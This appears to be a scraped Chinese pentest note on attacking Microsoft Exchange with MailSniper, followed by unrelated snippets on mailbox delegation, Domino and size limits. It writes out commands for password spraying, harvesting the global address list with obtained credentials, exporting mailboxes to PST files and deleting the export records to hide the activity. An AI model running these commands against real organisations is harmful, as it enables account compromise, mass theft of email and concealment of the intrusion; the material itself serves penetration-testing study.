目錄
mailsniper
jason
exchange郵箱伺服器資訊收集
在滲透測試過程中,經常會碰到使用exchange郵箱的系統。但是outlook web access(owa)端是無法爆破的,可以爆破客戶端。
mailsniper是乙個滲透測試工具,用於在microsoftexchange環境中搜尋特定術語(密碼、內部資訊、網路體系結構資訊等)的電子郵件。它可以用作非管理使用者來搜尋自己的電子郵件,也可以由exchange管理員用於搜尋域中每個使用者的郵箱。mailsniper還包括用於密碼噴塗、列舉使用者/域、從owa和ews收集全域性位址列表以及檢查組織中每個exchange使用者的郵箱許可權的其他模組。
爆破使用者名稱密碼
爆破exchange郵箱使用者名稱密碼,為了防止賬號被鎖定,所以我們使用密碼噴灑攻擊,即只使用乙個密碼來碰撞使用者名稱
invoke-passwordsprayews -exchhostname win2008.xie.com -userlist user.txt -password p@ss123 -threads 10 -outfile .\success-address-list.txt -exchangeversion exchange2007_sp1
獲取郵箱通訊錄在獲取乙個郵箱賬號密碼後,可以使用mailsniper收集通訊錄,當拿到通訊錄後,可以再次利用上述爆破手段繼續嘗試弱密碼,但是記住,密碼次數不要太多,很有可能會造成域使用者鎖定
get-globaladdresslist -exchhostname win2008.xie.com -username xie\hack -password p@ss123 -outfile address-list.txt -exchangeversion exchange2007_sp1
在拿到了exchange郵箱伺服器的許可權後,我們可以做一些資訊收集,包括不限於使用者、郵件。
獲取所有郵箱使用者:
get-mailbox
匯出郵件:
new-mailboxexportrequest -mailbox username -filepath ("\\localhost\c$\test\username.pst")
獲取郵箱通訊錄,通過outlook web端登入匯出
匯出後會有記錄,用如下命令可以檢視:
get-mailboxexportrequest
刪除某個匯出記錄:
remove-mailboxexportrequest -identity 'username\mailboxexport' -confirm:$false
配置Exchange郵箱完全訪問許可權
一 問題與需求闡述 1.在很多企業中,都會有boss希望其秘書能夠以其名義檢視並且傳送郵件 2.此需求可以通過將boss的密碼告知秘書,讓其管理自己的郵箱,但是會存在一定的風險 3.此外還可以通過配置郵箱的完全訪問許可權實現。二 目標 對a使用者的郵箱賦予b使用者具有完全訪問許可權,讓b使用者對a郵...
企業郵箱domino跟exchange
一 什麼是domino ibm domino 是一種群組工作軟體。使用了domino的伺服器就叫domino伺服器 domino的功能強大,介面豐富,主要用於輔助多人協同工作,從而突破平台 技術 組織和地理上的限制,充分實現資訊與技術方面的共享。該軟體目前在企業級基礎通訊 辦公自動化和資訊發布等領域...
Exchange 2010 郵箱大小限制原則
在 exchange中文站 的qq群 68280328 裡經常會有朋友問到關於 exchange 2010 郵件大小限制的問題,因為有許多地方,而且定義的內容又是同樣的,所以,讓本來很簡單的限制原則變得模糊了,下面的一篇關於 exchange 2010 中郵件大小限制的文單 悅享人,希望可以為大家在...